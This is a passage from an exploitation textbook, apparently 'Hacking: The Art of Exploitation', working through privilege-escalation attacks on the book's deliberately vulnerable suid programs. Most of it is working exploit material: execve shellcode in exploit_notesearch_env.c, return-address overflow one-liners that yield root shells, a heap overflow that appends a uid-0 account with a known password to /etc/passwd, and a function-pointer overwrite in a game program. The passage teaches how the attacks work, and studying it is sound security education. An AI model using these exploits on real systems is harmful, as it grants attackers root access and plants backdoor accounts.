"1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:

*.rpm=01;3

1:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:

*.ppm=01

;35:*.tga=0"...

(gdb) x/s 0xbffff8e3

0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...

(gdb) x/s 0xbffff8e3 + 100

0xbffff947: '\220' <repeats 110 times>, "1�1�1�\231���\200j\vXQh//shh/bin\

211�Q\211�S\211��\200"

(gdb)

The debugger reveals the location of the shellcode, shown in bold above. (When the program is run outside of the debugger, these addresses might be a little different.) The debugger also has some information on the stack, which shifts the addresses around a bit. But with a 200-byte NOP sled, these inconsistencies aren't a problem if an address near the middle of the sled is picked. In the output above, the address 0xbffff947 is shown to be close to the middle of the NOP sled, which should give us enough wiggle room. After determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address.

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#

The target address is repeated enough times to overflow the return address, and execution returns into the NOP sled in the environment variable, which inevitably leads to the shellcode. In situations where the overflow buffer isn't large enough to hold shellcode, an environment variable can be used with a large NOP sled. This usually makes exploitations quite a bit easier.

A huge NOP sled is a great aid when you need to guess at the target return addresses, but it turns out that the locations of environment variables are easier to predict than the locations of local stack variables. In C's standard library there is a function called getenv(), which accepts the name of an environment variable as its only argument and returns that variable's memory address. The code in getenv_example.c demonstrates the use of getenv().

getenv_example.c

#include <stdio.h>

#include <stdlib.h>

int main(int argc, char *argv[]) {

printf("%s is at %p\n", argv[1], getenv(argv[1]));

}

When compiled and run, this program will display the location of a given environment variable in its memory. This provides a much more accurate prediction of where the same environment variable will be when the target program is run.

reader@hacking:~/booksrc $ gcc getenv_example.c

reader@hacking:~/booksrc $ ./a.out SHELLCODE

SHELLCODE is at 0xbffff90b

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

This is accurate enough with a large NOP sled, but when the same thing is attempted without a sled, the program crashes. This means the environment prediction is still off.

reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./a.out SLEDLESS

SLEDLESS is at 0xbfffff46

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

In order to be able to predict an exact memory address, the differences in the addresses must be explored. The length of the name of the program being executed seems to have an effect on the address of the environment variables. This effect can be further explored by changing the name of the program and experimenting. This type of experimentation and pattern recognition is an important skill for a hacker to have.

reader@hacking:~/booksrc $ cp a.out a

reader@hacking:~/booksrc $ ./a SLEDLESS

SLEDLESS is at 0xbfffff4e

reader@hacking:~/booksrc $ cp a.out bb

reader@hacking:~/booksrc $ ./bb SLEDLESS

SLEDLESS is at 0xbfffff4c

reader@hacking:~/booksrc $ cp a.out ccc

reader@hacking:~/booksrc $ ./ccc SLEDLESS

SLEDLESS is at 0xbfffff4a

reader@hacking:~/booksrc $ ./a.out SLEDLESS

SLEDLESS is at 0xbfffff46

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfffff4e - 0xbfffff46

$1 = 8

(gdb) quit

reader@hacking:~/booksrc $

As the preceding experiment shows, the length of the name of the executing program has an effect on the location of exported environment variables. The general trend seems to be a decrease of two bytes in the address of the environment variable for every single-byte increase in the length of the program name. This holds true with the program name a.out, since the difference in length between the names a.out and a is four bytes, and the difference between the address 0xbfffff4e and 0xbfffff46 is eight bytes. This must mean the name of the executing program is also located on the stack somewhere, which is causing the shifting.

Armed with this knowledge, the exact address of the environment variable can be predicted when the vulnerable program is executed. This means the crutch of a NOP sled can be eliminated. The getenvaddr.c program adjusts the address based on the difference in program name length to provide a very accurate prediction.

getenvaddr.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[]) {

char *ptr;

if(argc < 3) {

printf("Usage: %s <environment var> <target program name>\n", argv[0]);

exit(0);

}

ptr = getenv(argv[1]); /* Get env var location. */

ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */

printf("%s will be at %p\n", argv[1], ptr);

}

When compiled, this program can accurately predict where an environment variable will be in memory during a target program's execution. This can be used to exploit stack-based buffer overflows without the need for a NOP sled.

reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c

reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch

SLEDLESS will be at 0xbfffff3c

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

As you can see, exploit code isn't always needed to exploit programs. The use of environment variables simplifies things considerably when exploiting from the command line, but these variables can also be used to make exploit code more reliable.

The system() function is used in the notesearch_exploit.c program to execute a command. This function starts a new process and runs the command using /bin/sh -c. The -c tells the sh program to execute commands from the command-line argument passed to it. Google's code search can be used to find the source code for this function, which will tell us more. Go to http://www.google.com/codesearch?q=package:libc+system to see this code in its entirety.

Code from libc-2.2.2

int system(const char * cmd)

{

int ret, pid, waitstat;

void (*sigint) (), (*sigquit) ();

if ((pid = fork()) == 0) {

execl("/bin/sh", "sh", "-c", cmd, NULL);

exit(127);

}

if (pid < 0) return(127 << 8);

sigint = signal(SIGINT, SIG_IGN);

sigquit = signal(SIGQUIT, SIG_IGN);

while ((waitstat = wait(&ret)) != pid && waitstat != -1);

if (waitstat == -1) ret = -1;

signal(SIGINT, sigint);

signal(SIGQUIT, sigquit);

return(ret);

}

The important part of this function is shown in bold. The fork() function starts a new process, and the execl() function is used to run the command through /bin/sh with the appropriate command-line arguments.

The use of system() can sometimes cause problems. If a setuid program uses system(), the privileges won't be transferred, because /bin/sh has been dropping privileges since version two. This isn't the case with our exploit, but the exploit doesn't really need to be starting a new process, either. We can ignore the fork() and just focus on the execl() function to run the command.

The execl() function belongs to a family of functions that execute commands by replacing the current process with the new one. The arguments for execl() start with the path to the target program and are followed by each of the command-line arguments. The second function argument is actually the zeroth command-line argument, which is the name of the program. The last argument is a NULL to terminate the argument list, similar to how a null byte terminates a string.

The execl() function has a sister function called execle(), which has one additional argument to specify the environment under which the executing process should run. This environment is presented in the form of an array of pointers to null-terminated strings for each environment variable, and the environment array itself is terminated with a NULL pointer.

With execl(), the existing environment is used, but if you use execle(), the entire environment can be specified. If the environment array is just the shellcode as the first string (with a NULL pointer to terminate the list), the only environment variable will be the shellcode. This makes its address easy to calculate. In Linux, the address will be 0xbffffffa, minus the length of the shellcode in the environment, minus the length of the name of the executed program. Since this address will be exact, there is no need for a NOP sled. All that's needed in the exploit buffer is the address, repeated enough times to overflow the return address in the stack, as shown in exploit_nosearch_env.c.

exploit_notesearch_env.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

char *env[2] = {shellcode, 0};

unsigned int i, ret;

char *buffer = (char *) malloc(160);

ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");

for(i=0; i < 160; i+=4)

*((unsigned int *)(buffer+i)) = ret;

execle("./notesearch", "notesearch", buffer, 0, env);

free(buffer);

}

This exploit is more reliable, since it doesn't need a NOP sled or any guesswork regarding offsets. Also, it doesn't start any additional processes.

reader@hacking:~/booksrc $ gcc exploit_notesearch_env.c

reader@hacking:~/booksrc $ ./a.out

-------[ end of note data ]-------

sh-3.2#

Overflows in Other Segments

Buffer overflows can happen in other memory segments, like heap and bss. As in auth_overflow.c, if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered. This is true regardless of the memory segment these variables reside in; however, the control tends to be quite limited. Being able to find these control points and learning to make the most of them just takes some experience and creative thinking. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective.

A Basic Heap-Based Overflow

The notetaker program from Chapter 0x200 is also susceptible to a buffer overflow vulnerability. Two buffers are allocated on the heap, and the first command-line argument is copied into the first buffer. An overflow can occur here.

Excerpt from notetaker.c

buffer = (char *) ec_malloc(100);

datafile = (char *) ec_malloc(20);

strcpy(datafile, "/var/notes");

if(argc < 2) // If there aren't command-line arguments,

usage(argv[0], datafile); // display usage message and exit.

strcpy(buffer, argv[1]); // Copy into buffer.

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);

printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

Under normal conditions, the buffer allocation is located at 0x804a008, which is before the datafile allocation at 0x804a070, as the debugging output shows. The distance between these two addresses is 104 bytes.

reader@hacking:~/booksrc $ ./notetaker test

[DEBUG] buffer @ 0x804a008: 'test'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0x804a070 - 0x804a008

$1 = 104

(gdb) quit

reader@hacking:~/booksrc $

Since the first buffer is null terminated, the maximum amount of data that can be put into this buffer without overflowing into the next should be 104 bytes.

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104')

[DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[DEBUG] datafile @ 0x804a070: ''

[!!] Fatal Error in main() while opening file: No such file or directory

reader@hacking:~/booksrc $

As predicted, when 104 bytes are tried, the null-termination byte overflows into the beginning of the datafile buffer. This causes the datafile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if the datafile buffer is overwritten with something more than just a null byte?

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104 . "testfile"')

[DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile'

[DEBUG] datafile @ 0x804a070: 'testfile'

[DEBUG] file descriptor is 3

Note has been saved.

*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***

======= Backtrace: =========

/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]

/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]

./notetaker[0x8048916]

/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]

./notetaker[0x8048511]

======= Memory map: ========

08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]

b7d00000-b7d21000 rw-p b7d00000 00:00 0

b7d21000-b7e00000 ---p b7d21000 00:00 0

b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e99000-b7e9a000 rw-p b7e99000 00:00 0

b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0

b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0

b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so

b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so

bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]

ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]

Aborted

reader@hack ing:~/booksrc $

This time, the overflow is designed to overwrite the datafile buffer with the string testfile. This causes the program to write to testfile instead of /var/notes, as it was originally programmed to do. However, when the heap memory is freed by the free() command, errors in the heap headers are detected and the program is terminated. Similar to the return address overwrite with stack overflows, there are control points within the heap architecture itself. The most recent version of glibc uses heap memory management functions that have evolved specifically to counter heap unlinking attacks. Since version 2.2.5, these functions have been rewritten to print debugging information and terminate the program when they detect problems with the heap header information. This makes heap unlinking in Linux very difficult. However, this particular exploit doesn't use heap header information to do its magic, so by the time free() is called, the program has already been tricked into writing to a new file with root privileges.

reader@hacking:~/booksrc $ grep -B10 free notetaker.c

if(write(fd, buffer, strlen(buffer)) == -1) // Write note.

fatal("in main() while writing buffer to file");

write(fd, "\n", 1); // Terminate line.

// Closing file

if(close(fd) == -1)

fatal("in main() while closing file");

printf("Note has been saved.\n");

free(buffer);

free(datafile);

reader@hacking:~/booksrc $ ls -l ./testfile

-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile

reader@hacking:~/booksrc $ cat ./testfile

cat: ./testfile: Permission denied

reader@hacking:~/booksrc $ sudo cat ./testfile

?

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAtestfile

reader@hacking:~/booksrc $

A string is read until a null byte is encountered, so the entire string is written to the file as the userinput. Since this is a suid root program, the file that is created is owned by root. This also means that since the filename can be controlled, data can be appended to any file. This data does have some restrictions, though; it must end with the controlled filename, and a line with the user ID will be written, also.

There are probably several clever ways to exploit this type of capability. The most apparent one would be to append something to the /etc/passwd file. This file contains all of the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much.

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd.bkup

reader@hacking:~/booksrc $ head /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

reader@hacking:~/booksrc $

The fields in the /etc/passwd file are delimited by colons, the first field being for login name, then password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the xcharacter, since the encrypted passwords are stored elsewhere in a shadow file. (However, this field can contain the encrypted password.) In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry with both root privileges and a known password to the password file.

The password can be encrypted using a one-way hashing algorithm. Because the algorithm is one way, the original password cannot be recreated from the hash value. To prevent lookup attacks, the algorithm uses a salt value, which when varied creates a different hash value for the same input password. This is a common operation, and Perl has a crypt() function that performs it. The first argument is the password, and the second is the salt value. The same password with a different salt produces a different salt.

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA"). "\n"'

AA6tQYSfGxd/A

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "XX"). "\n"'

XXq2wKiyI43A2

reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash. When a user logs in and enters a password, the system looks up the encrypted password for that user. Using the salt value from the stored encrypted password, the system uses the same one-way hashing algorithm to encrypt whatever text the user typed as the password. Finally, the system compares the two hashes; if they are the same, the user must have entered the correct password. This allows the password to be used for authentication without requiring that the password be stored anywhere on the system.

Using one of these hashes in the password field will make the password for the account be password, regardless of the salt value used. The line to append to /etc/passwd should look something like this:

myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd, because the string must end with /etc/passwd. However, if that filename is merely appended to the end of the entry, the passwd file entry would be incorrect. This can be compensated for with the clever use of a symbolic file link, so the entry can both end with /etc/passwd and still be a valid line in the password file. Here's how it works:

reader@hacking:~/booksrc $ mkdir /tmp/etc

reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd

reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd

lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash

reader@hacking:~/booksrc $

Now /tmp/etc/passwd points to the login shell /bin/bash. This means that a valid login shell for the password file is also /tmp/etc/passwd, making the following a valid password file line:

myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion before /etc/passwd is exactly 104 bytes long:

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc

-c

38

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 .

":/root:/tmp"'

| wc -c

86

reader@hacking:~/booksrc $ gdb -q

(gdb) p 104 - 86 + 50

$1 = 68

(gdb) quit

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .

":/root:/tmp"'

| wc -c

104

reader@hacking:~/booksrc $

If /etc/passwd is added to the end of that final string (shown in bold), the string above will be appended to the end of the /etc/passwd file. And since this line defines an account with root privileges with a password we set, it won't be difficult to access this account and obtain root access, as the following output shows.

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"

. "A"x68 .

":/root:/tmp/etc/passwd"')

[DEBUG] buffer @ 0x804a008: 'myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'

[DEBUG] datafile @ 0x804a070: '/etc/passwd'

[DEBUG] file descriptor is 3

Note has been saved.

*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***

======= Backtrace: =========

/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]

/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]

./notetaker[0x8048916]

/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]

./notetaker[0x8048511]

======= Memory map: ========

08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]

b7d00000-b7d21000 rw-p b7d00000 00:00 0

b7d21000-b7e00000 ---p b7d21000 00:00 0

b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e99000-b7e9a000 rw-p b7e99000 00:00 0

b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0

b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0

b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so

b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so

bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]

ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]

Aborted

reader@hacking:~/booksrc $ tail /etc/passwd

avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

cupsys:x:106:113::/home/cupsys:/bin/false

haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false

hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false

gdm:x:109:118:Gnome Display Manager:/var/lib/gdm:/bin/false

matrix:x:500:500:User Acct:/home/matrix:/bin/bash

jose:x:501:501:Jose Ronnick:/home/jose:/bin/bash

reader:x:999:999:Hacker,,,:/home/reader:/bin/bash

?

myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAA:/

root:/tmp/etc/passwd

reader@hacking:~/booksrc $ su myroot

Password:

root@hacking:/home/reader/booksrc# whoami

root

root@hacking:/home/reader/booksrc#

Overflowing Function Pointers

If you have played with the game_of_chance.c program enough, you will realize that, similar to at a casino, most of the games are statistically weighted in favor of the house. This makes winning credits difficult, despite how lucky you might be. Perhaps there's a way to even the odds a bit. This program uses a function pointer to remember the last game played. This pointer is stored in the user structure, which is declared as a global variable. This means all the memory for the user structure is allocated in the bss segment.

From game_of_chance.c

// Custom user struct to store information about users

struct user {

int uid;

int credits;

int highscore;

char name[100];

int (*current_game) ();

};

...

// Global variables

struct user player; // Player struct

The name buffer in the user structure is a likely place for an overflow. This buffer is set by the input_name() function, shown below:

// This function is used to input the player name, since

// scanf("%s", &whatever) will stop input at the first space.

void input_name() {

char *name_ptr, input_char='\n';

while(input_char == '\n') // Flush any leftover

scanf("%c", &input_char); // newline chars.

name_ptr = (char *) &(player.name); // name_ptr = player name's address

while(input_char != '\n') { // Loop until newline.

*name_ptr = input_char; // Put the input char into name field.

scanf("%c", &input_char); // Get the next char.

name_ptr++; // Increment the name pointer.

}

*name_ptr = 0; // Terminate the string.

}

This function only stops inputting at a newline character. There is nothing to limit it to the length of the destination name buffer, meaning an overflow is possible. In order to take advantage of the overflow, we need to make the program call the function pointer after it is overwritten. This happens in the play_the_game() function, which is called when any game is selected from the menu. The following code snippet is part of the menu selection code, used for picking and playing a game.

if((choice < 1) || (choice > 7))

printf("\n[!!] The number %d is an invalid selection.\n\n", choice);

else if (choice < 4) { // Otherwise, choice was a game of some sort.

if(choice != last_game) { // If the function ptr isn't set,

if(choice == 1) // then point it at the selected game

player.current_game = pick_a_number;

else if(choice == 2)

player.current_game = dealer_no_match;

else

player.current_game = find_the_ace;

last_game = choice; // and set last_game.

}

play_the_game(); // Play the game.

}

If last_game isn't the same as the current choice, the function pointer of current_game is changed to the appropriate game. This means that in order to get the program to call the function pointer without overwriting it, a game must be played first to set the last_game variable.

reader@hacking:~/booksrc $ ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 70 credits] -> 1

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: 5

The winning number is 17

Sorry, you didn't win.

You now have 60 credits

Would you like to play again? (y/n) n

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

[1]+ Stopped ./game_of_chance

reader@hack ing:~/booksrc $

You can temporarily suspend the current process by pressing CTRL-Z. At this point, the last_game variable has been set to 1, so the next time 1 is selected, the function pointer will simply be called without being changed. Back at the shell, we figure out an appropriate overflow buffer, which can be copied and pasted in as a name later. Recompiling the source with debugging symbols and using GDB to run the program with a breakpoint on main() allows us to explore the memory. As the output below shows, the name buffer is 100 bytes from the current_game pointer within the user structure.

reader@hacking:~/booksrc $ gcc -g game_of_chance.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) break main

Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at game_of_chance.c:41

41 srand(time(0)); // Seed the randomizer with the current time.

(gdb) p player

$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>,

current_game = 0}

(gdb) x/x &player.name

0x804b66c <player+12>: 0x00000000

(gdb) x/x &player.current_game

0x804b6d0 <player+112>: 0x00000000

(gdb) p 0x804b6d0 - 0x804b66c

$2 = 100

(gdb) quit

The program is running. Exit anyway? (y or n) y

reader@hacking:~/booksrc $

Using this information, we can generate a buffer to overflow the name variable with. This can be copied and pasted into the interactive Game of Chance program when it is resumed. To return to the suspended process, just type fg, which is short for foreground.

reader@hacking:~/booksrc $ perl -e 'print "A"x100 . "BBBB" . "\n"'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAABBBB

reader@hacking:~/booksrc $ fg

./game_of_chance

5

Change user name

Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]

[You have 60 credits] -> 1

[DEBUG] current_game pointer @ 0x42424242

Segmentation fault

reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow buffer. This will overwrite the function pointer with 0x42424242. When menu option 1 is selected again, the program will crash when it tries to call the function pointer. This is proof that execution can be controlled; now all that's needed is a valid address to insert in place of BBBB.

The nm command lists symbols in object files. This can be used to find addresses of various functions in a program.

reader@hacking:~/booksrc $ nm game_of_chance

0804b508 d _DYNAMIC

0804b5d4 d _GLOBAL_OFFSET_TABLE_

080496c4 R _IO_stdin_used

w _Jv_RegisterClasses

0804b4f8 d __CTOR_END__

0804b4f4 d __CTOR_LIST__

0804b500 d __DTOR_END__

0804b4fc d __DTOR_LIST__

0804a4f0 r __FRAME_END__

0804b504 d __JCR_END__

0804b504 d __JCR_LIST__

0804b630 A __bss_start

0804b624 D __data_start

08049670 t __do_global_ctors_aux

08048610 t __do_global_dtors_aux

0804b628 D __dso_handle

w __gmon_start__

08049669 T __i686.get_pc_thunk.bx

0804b4f4 d __init_array_end

0804b4f4 d __init_array_start

080495f0 T __libc_csu_fini

08049600 T __libc_csu_init

U __libc_start_main@@GLIBC_2.0

0804b630 A _edata

0804b6d4 A _end

080496a0 T _f ini

080496c0 R _fp_hw

08048484 T _init

080485c0 T _start

080485e4 t call_gmon_start

U close@@GLIBC_2.0

0804b640 b completed.1

0804b624 W data_start

080490d1 T dealer_no_match

080486fc T dump

080486d1 T ec_malloc

U exit@@GLIBC_2.0

08048684 T fatal

080492bf T find_the_ace

08048650 t frame_dummy

080489cc T get_player_data

U getuid@@GLIBC_2.0

08048d97 T input_name

08048d70 T jackpot

08048803 T main

U malloc@@GLIBC_2.0

U open@@GLIBC_2.0

0804b62c d p.0

U perror@@GLIBC_2.0

08048fde T pick_a_number

08048f23 T play_the_game

0804b660 B player

08048df8 T print_cards

U printf@@GLIBC_2.0

U rand@@GLIBC_2.0

U read@@GLIBC_2.0

08048aaf T register_new_player

U scanf@@GLIBC_2.0

08048c72 T show_highscore

U srand@@GLIBC_2.0

U strcpy@@GLIBC_2.0

U strncat@@GLIBC_2.0

08048e91 T take_wager

U time@@GLIBC_2.0

08048b72 T update_player_data

U write@@GLIBC_2.0

reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit. Even though the games give terrible odds, if the current_game function pointer is carefully overwritten with the address of the jackpot() function, you won't even have to play the game to win credits. Instead, the jackpot() function will just be called directly, doling out the reward of 100 credits and tipping the scales in the player's direction.

This program takes its input from standard input. The menu selections can be scripted in a single buffer that is piped to the program's standard input. These selections will be made as if they were typed. The following example will choose menu item 1, try to guess the number 7, select n when asked to play again, and finally select menu item 7 to quit.

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 20

Sorry, you didn't win.

You now have 50 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

